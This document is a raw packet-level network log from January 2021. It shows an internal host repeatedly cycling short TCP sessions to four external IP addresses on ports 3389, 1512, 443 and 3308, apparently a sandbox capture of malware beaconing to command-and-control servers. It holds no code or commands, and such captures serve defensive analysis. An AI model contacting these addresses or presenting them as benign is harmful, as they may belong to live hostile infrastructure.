Jan 11, 2021 16:54:01.402920961 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.456729889 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.490066051 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.490102053 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.490176916 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.490235090 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.503690004 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.569334984 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.569530964 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.580419064 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.580709934 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.638129950 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.638324022 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.677628040 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.692085981 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.692105055 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.800254107 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.800271988 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.800424099 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.806775093 CET	49361	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:01.860893011 CET	3389	49361	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:01.928050041 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:01.980890036 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:01.980971098 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:01.982636929 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.035346985 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.042640924 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.042664051 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.042741060 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.062825918 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.116981030 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.117178917 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.126260042 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.126405001 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.179114103 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.179197073 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.216758966 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.231966019 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.231988907 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.329452038 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.329472065 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.329639912 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.335298061 CET	49362	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:02.388068914 CET	1512	49362	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:02.441535950 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.493704081 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.493849039 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.495693922 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.547828913 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.562263966 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.562364101 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.573956966 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.628597975 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.628807068 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.633678913 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.633831978 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.685774088 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.685941935 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.722944021 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.738224030 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.856417894 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.856458902 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.856626034 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.861717939 CET	49363	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:02.913873911 CET	443	49363	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:02.974644899 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.017891884 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.018037081 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.019805908 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.062912941 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.076683044 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.076716900 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.076773882 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.076800108 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.095937014 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.141464949 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.141578913 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.151633978 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.152017117 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.195095062 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.195218086 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.238363028 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.350840092 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.350879908 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.351150036 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.357362986 CET	49364	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:03.400609970 CET	3308	49364	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:03.473267078 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.527517080 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.527705908 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.529162884 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.583651066 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.639231920 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.639270067 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.639405966 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.651436090 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.705842972 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.717957020 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.718044043 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.724685907 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.724801064 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.778723955 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.779061079 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.819133043 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.833180904 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.833219051 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.924083948 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.924124956 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:03.924360991 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.924407959 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.930058002 CET	49365	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:03.984177113 CET	3389	49365	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:04.050317049 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.103338003 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.103493929 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.105253935 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.157974958 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.164868116 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.164901972 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.164984941 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.165031910 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.181755066 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.235908985 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.236026049 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.245129108 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.245405912 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.300321102 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.300611973 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.338989019 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.356120110 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.356153965 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.456199884 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.456234932 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.456329107 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.456397057 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.458693981 CET	49366	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:04.511408091 CET	1512	49366	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:04.565212011 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.617523909 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.617641926 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.618505955 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.670600891 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.685772896 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.685868979 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.698321104 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.752939939 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.753134012 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.763921022 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.764323950 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.816569090 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.816843987 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.854815960 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.869180918 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.986682892 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.986726999 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:04.987014055 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:04.992737055 CET	49367	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:05.045075893 CET	443	49367	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:05.162811995 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.205988884 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.206116915 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.207830906 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.250798941 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.266596079 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.266617060 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.266685963 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.279638052 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.325159073 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.325243950 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.331645966 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.331842899 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.375490904 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.375776052 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.414076090 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.419491053 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.419528008 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.530031919 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.530055046 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.530246973 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.536056042 CET	49368	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:05.579086065 CET	3308	49368	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:05.685635090 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.740154982 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:05.740268946 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.741628885 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.797221899 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:05.824688911 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:05.824731112 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:05.824937105 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.833246946 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.903244972 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:05.903527975 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.914171934 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.914331913 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:05.968146086 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:05.968398094 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:06.008002043 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:06.022413969 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:06.022433043 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:06.111913919 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:06.111953974 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:06.112265110 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:06.112312078 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:06.118030071 CET	49369	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:06.171685934 CET	3389	49369	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:06.270427942 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.323152065 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.323290110 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.324860096 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.377492905 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.384466887 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.384480000 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.384604931 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.399157047 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.453140020 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.453439951 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.463855028 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.464276075 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.516911030 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.517126083 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.556737900 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.569820881 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.569866896 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.672904968 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.672934055 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.673122883 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.676875114 CET	49370	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:06.729537964 CET	1512	49370	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:06.794219971 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.846468925 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:06.846606016 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.847235918 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.899508953 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:06.915021896 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:06.915128946 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.927711964 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.982074022 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:06.982239008 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.993237019 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:06.993773937 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:07.046021938 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:07.046288013 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:07.098681927 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:07.215733051 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:07.215778112 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:07.215847015 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:07.215878010 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:07.222352028 CET	49371	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:07.274507999 CET	443	49371	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:07.342710972 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.385888100 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.386120081 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.388057947 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.431226015 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.442168951 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.442214012 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.442310095 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.442351103 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.456753969 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.501504898 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.501800060 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.512250900 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.512618065 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.555689096 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.555869102 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.595921993 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.598920107 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.598951101 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.711220980 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.711280107 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.711493969 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.714072943 CET	49372	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:07.757077932 CET	3308	49372	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:07.825727940 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:07.879836082 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:07.880203009 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:07.881638050 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:07.935674906 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:07.979603052 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:07.979648113 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:07.979862928 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:07.995146990 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.050679922 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.063045025 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.063260078 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.077668905 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.077939034 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.132114887 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.132374048 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.173402071 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.187532902 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.187568903 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.276736021 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.276777983 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.276954889 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.282277107 CET	49373	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:08.336606979 CET	3389	49373	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:08.402935982 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.455811977 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.455894947 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.457561970 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.510360956 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.517273903 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.517306089 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.517400980 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.535377979 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.589297056 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.589517117 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.599992990 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.600354910 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.653234005 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.653379917 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.706185102 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.803565979 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.803586960 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.803829908 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.809361935 CET	49374	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:08.862286091 CET	1512	49374	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:08.917509079 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:08.969868898 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:08.970019102 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:08.971259117 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.023380041 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.038177967 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.038326979 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.052201986 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.106693029 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.106781960 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.111820936 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.111964941 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.164010048 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.164117098 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.202760935 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.216439009 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.333616018 CET	443	49375	77.220.64.37	192.168.2.22
